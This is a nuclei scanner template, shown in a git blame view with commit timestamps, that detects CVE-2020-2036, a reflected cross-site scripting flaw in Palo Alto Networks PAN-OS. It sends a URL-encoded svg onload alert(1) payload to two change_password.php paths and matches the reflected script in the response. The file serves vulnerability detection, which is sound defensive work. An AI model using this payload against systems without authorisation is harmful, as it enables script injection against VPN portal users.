nuclei-templates/cves/2020/CVE-2020-2036.yaml

29 lines
689 B
YAML
Raw Normal View History

2021-02-14 20:00:21 +00:00
id: CVE-2020-2036
info:
2021-02-15 19:05:52 +00:00
name: Palo Alto Networks Reflected XSS
2021-02-14 20:00:21 +00:00
author: madrobot
severity: medium
reference: https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/
2021-02-15 19:05:52 +00:00
tags: cve,cve2020,vpn,xss
2021-02-14 20:00:21 +00:00
requests:
- method: GET
path:
2021-02-14 20:01:58 +00:00
- "{{BaseURL}}/unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E"
- "{{BaseURL}}/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E"
2021-02-15 19:05:52 +00:00
2021-02-14 20:00:21 +00:00
matchers-condition: and
matchers:
- type: status
status:
- 200
2021-02-15 19:05:52 +00:00
2021-02-14 20:00:21 +00:00
- type: word
words:
- "<svg/onload=alert(1)>"
part: body
2021-02-15 19:05:52 +00:00
- type: word
words:
- "text/html"
part: header